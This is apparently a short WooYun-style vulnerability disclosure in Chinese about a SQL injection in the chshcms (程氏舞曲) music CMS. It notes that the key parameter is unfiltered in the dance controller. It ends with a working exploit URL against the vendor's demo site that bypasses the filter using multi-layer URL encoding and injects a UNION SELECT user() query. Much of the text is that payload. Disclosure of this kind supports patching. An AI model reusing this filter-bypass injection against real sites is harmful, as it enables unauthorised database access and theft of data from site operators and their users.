WooYun: 程氏舞曲 Sql一枚 依旧无视Gpc。
对这个洞的过滤进行绕过。
改了过滤的函数。 让我继续搞。
_____________________________________________________________________
发现过滤了zj.php中的key
但是app/controllers/dance.php中 没过滤。
解码一个。
这里过滤。
编码绕过。
http://demo.chshcms.com/index.php/dance/so/key/?key=%252527) %25%36%31%25%36%45%25%36%34 1=2 union %25%37%33%25%36%35%25%36%43%25%36%35%25%36%33%25%37%34 user(),user(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42 %23